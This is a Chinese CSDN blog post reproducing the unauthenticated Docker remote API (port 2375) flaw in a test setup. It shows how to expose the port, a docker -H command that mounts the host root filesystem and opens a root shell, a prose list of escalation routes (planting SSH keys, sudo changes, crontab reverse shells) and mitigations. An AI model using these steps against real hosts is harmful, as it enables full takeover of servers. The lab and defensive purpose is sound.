docker remote API 漏洞复现

已于 2023-10-11 10:20:32 修改
阅读量357 收藏
点赞数
分类专栏: 安全 web安全 网络安全 文章标签: docker 运维 linux
于 2023-04-03 10:07:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/text2204/article/details/129923055
版权
安全 同时被 3 个专栏收录
125 篇文章 0 订阅
订阅专栏
网络安全
125 篇文章 4 订阅
订阅专栏
web安全
124 篇文章 1 订阅
订阅专栏

漏洞描述

点击此处先领取282G网络安全资料再阅读

docker是一种开源的应用容器引擎,这个漏洞是利用docker对外开放的一个api接口,因为权限设置不当,导致可以远程命令执行。

测试环境

· 本地一台虚拟机,一台临时创建的阿里云服务器

· centos7

· docker-ce-18.09.9

漏洞复现

首先探测2375端口,如果开放,再构造http:localhost:2375/version请求,如果返回包带有json格式,说明存在该漏洞。

1、安装docker

配置宿主机网卡转发

若未配置,需要执行如下$ cat < /etc/sysctl.d/docker.confnet.bridge.bridge-nf-

call-ip6tables = 1net.bridge.bridge-nf-call-iptables =
1net.ipv4.ip_forward=1EOF$ sysctl -p /etc/sysctl.d/docker.conf

Yum安装配置docker

下载阿里源repo文件$ curl -o /etc/yum.repos.d/Centos-7.repo

http://mirrors.aliyun.com/repo/Centos-7.repo$ curl -o /etc/yum.repos.d/docker-
ce.repo http://mirrors.aliyun.com/docker-ce/linux/centos/docker-ce.repo$ yum
clean all && yum makecache## 安装指定版本yum install -y docker-ce-18.09.9## 配置源加速##
https://cr.console.aliyun.com/cn-hangzhou/instances/mirrorsmkdir -p
/etc/dockervi /etc/docker/daemon.json{ “registry-mirrors” : [
“https://8xpk5wnt.mirror.aliyuncs.com” ]}## 设置开机自启systemctl enable docker
systemctl daemon-reload## docker daemonps aux |grep docker## containerdps
aux|grep containerdsystemctl status containerd

2、开启2375端口,提供外部访问

编辑docker文件:/usr/lib/systemd/system/docker.service

vim /usr/lib/systemd/system/docker.service

修改ExecStart行为下面内容

ExecStart=/usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix://var/run/docker.sock
\

重新加载docker配置

systemctl daemon-reload # 加载docker守护线程systemctl restart docker # 重启docker

· 查看端口

3、信息收集端口

4、查看返回包

5、添加、查看本地密钥

6、远程创建docker并添加密钥

docker -H tcp://8.135.2.198 run --rm -it -v /:/mnt busybox chroot /mnt sh

· 简单解释一下参数的含义:

· –rm 容器停止时,自动删除该容器

· -v 挂载目录。格式为 系统目录:容器目录

· -i 指示 docker 要在容器上打开一个标准的输入接口

· -t 指示 docker 要创建一个伪 tty 终端,连接容器的标准输入接口,之后用户就可以通过终端进行输入

7、本地连接目标宿主机

漏洞危害

通过此漏洞,可在docker命令执行,并且影响宿主机。

总结流程

引用网上的一些总结流程

1. Docker是以root权限运行的,这是所有姿势的前提

1.
Docker在运行一个容器的时候可以将宿主机上的一个目录挂载到容器内的一个目录,我们可以参考redis未授权访问漏洞,将宿主机的/root/.ssh目录挂载到容器上,然后写入公钥。如果有web目录的话,最差也能上一个webshell。

1.
有些服务器不允许root登录,可以写入其他用户的.ssh/目录下(通过查看/etc/ssh/sshd_config目录),然后修改/etc/sudoer中的文件,配置为sudo免密码,切换为root

1. 还可以通过crontab写计划任务反弹shell

漏洞修复

1.关闭2375端口 (尤其是公网情况下一定要禁用此端口)

2.在防火墙上配置禁止外网访问2375端口

最后

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

点击此处即可领取282G网络安全资料


同时每个成长路线对应的板块都有配套的视频提供:


当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。

点击此处即可领取282G网络安全资料

万天峰
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
1. 离线安装docker; 2. 实现docker-cert配置,修复docker remote API漏洞;.zip
04-30
docker安装 docker安装方法有多种,下面列举在Windows和Linux系统中的安装步骤:12 Windows系统中的安装方法: 对于Windows Server系统,可以使用Microsoft发布的PowerShell模块DockerMicrosoftProvider来安装...
Docker对外开放2375端口引发安全漏洞分析与解决方案
QT2016
07-03 9113
Docker对外开放2375端口引发安全漏洞分析与解决方案
docker api未授权导致rce 漏洞修复
core815的专栏
05-26 1364
docker api未授权导致rce 漏洞修复
docker未授权rce+docker逃逸复现
weixin_54227009的博客
05-22 1232
这段时间跟着bnessy师傅一起打内网,跟着bnessy师傅也学到了很多有用的姿势,这里就来复现几个内网的漏洞(大佬轻喷)
CVE漏洞复现-CVE-2019-5736 Docker逃逸
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-22 3265
Docker 是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的Linux或Windows操作系统的机器上,也可以实现虚拟化,容器是完全使用沙箱机制,相互之间不会有任何接口Docker环境和普通生产环境的差异在哪呢?举个列子,在普通的生产环境中,我们程序员写的代码产品在开发环境中能够运行起来,但却在测试环境中很容易出现各种的Bug,报错,这是因为两个环境中机器的配置和环境不一样所导致的而Docker的出现解决了这一差异性的问题。
Docker Remote API 逃逸攻击(2375端口)
最新发布
weixin_31610083的博客
01-19 585
本文分析了如何通过 Docker 2375远程管理API来完成逃逸,但该漏洞需要管理员主动配置,没有广泛存在,但利用难度很低。
Docker Remote API 未授权漏洞全球探测1
08-03
漏洞发现的起因是,有一位同学在使用 docker swarm 的时候,发现了管理的 docker 节点上会开放一个 TCP 端口 2375,绑定在 0.0.0.
DockerDocker Remote API 访问控制
01-09
Docker Remote API 访问控制 Docker的远程调用 API 接口存在未授权访问漏洞,至少应限制外网访问。建议使用 Socket 方式访问,监听内网 ip,docker daemon 启动方式如下: [root@localhost ~]# vim /usr/lib/systemd...
docker-api:Docker Remote API的轻量级Ruby客户端
03-31
安装将此行添加到应用程序的Gemfile中: gem 'docker-api' 然后运行: $ bundle install 另外,如果您只想在脚本中使用gem,则可以运行: $ gem install docker-api 最后,只需使用此gem将require 'docker'添加到...
Docker未授权漏洞复现(合天网安实验室)
weixin_51151498的博客
11-29 1262
Docker未授权漏洞复现(合天网安实验室)
docker2375端口未授权访问+远程登录
weixin_53587212的博客
05-05 826
ExecStart=/usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock 后面添加 -H tcp://0.0.0.0:2375。docker2375端口未授权访问:该未授权访问漏洞是因为docker remote api可以执行docker命令,该接口是目的是取代docker 命令界面,通过url操作docker。得到的结果与命令docker --version相似。执行开机禁用防火墙自启命令。再次执行查看防火墙命令。
[Shell]Docker remote api未授权访问漏洞(Port=2375)
baguangman5501的博客
09-16 675
0x01 简介 该未授权访问漏洞是因为docker remote api可以执行docker命令,从官方文档可以看出,该接口是目的是取代docker 命令界面,通过url操作dockerDocker remote Api未授权访问的攻击原理与之前的Redis未授权访问漏洞大同小异,都是通过向运行该应用的服务器写文件,从而拿到服务器的权限。 docker swarm是docker下的分...
配置开启Docker2375远程连接与解决Docker未授权访问漏洞
Sherry
11-13 4167
配置开启Docker2375远程连接与解决Docker未授权访问漏洞
漏洞复现 - - -Docker未授权访问漏洞
weixin_67503304的博客
08-16 4794
Docker未授权访问漏洞docker未授权写定时任务获取shell,详细概述了通过docker获取shell的方法。
docker开放2375端口,并添加安全传输层协议(TLS)和CA认证
热门推荐
honvin的博客
08-17 1万+
为了更便捷地打包和部署,服务器需要开放2375端口才能连接docker,但如果开放了端口没有做任何安全保护,会引起安全漏洞,被人入侵、挖矿、CPU飙升这些情况都有发生,任何知道你IP的人,都可以管理这台主机上的容器和镜像,真的可怕。 为了解决安全问题,只要使用安全传输层协议(TLS)进行传输并使用CA认证即可。 制作证书及秘钥 我们需要使用OpenSSL制作CA机构证书、服务端证书和客户端证书,以下操作均在安装DockerLinux服务器上进行。 创建一个目录用于存储生成的证书和秘钥 mkdir
关于docker remote api未授权访问漏洞的学习与研究
07-16 608
漏洞介绍: 该未授权访问漏洞是因为docker remote api可以执行docker命令,从官方文档可以看出,该接口是目的是取代docker 命令界面,通过url操作dockerdocker swarm是docker下的分布化应用的本地集群,在开放2375监听集群容器时,会调用这个api url输入ip:2375/version就会列出基本信息,和docker vers...
Docker API 未授权访问漏洞
qq_42383069的博客
05-09 7632
Docker API 未授权访问漏洞 1、漏洞简介 在Docker的部署文档中,由于默认存在某些不安全的配置样例,导致2375管理端口对外,该未授权访问漏洞是因为Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作Docker。 2、漏洞原理 利用 Docker 节点上开放的 TCP 端口 2375 远程执行 Docker 命令,进而可获取服务器 Root 权限。 3、漏洞环境搭建 这里我们直接使用 vluhub 环境 cd vulhub/docker/una
Docker Java API的pom引用地址
05-31
要使用Docker Java API,需要在Java项目的pom.xml文件中添加以下依赖: ``` <groupId>com.github.docker-java</groupId> <artifactId>docker-java <version>3.2.10 ``` 这个依赖会从Maven中央仓库获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值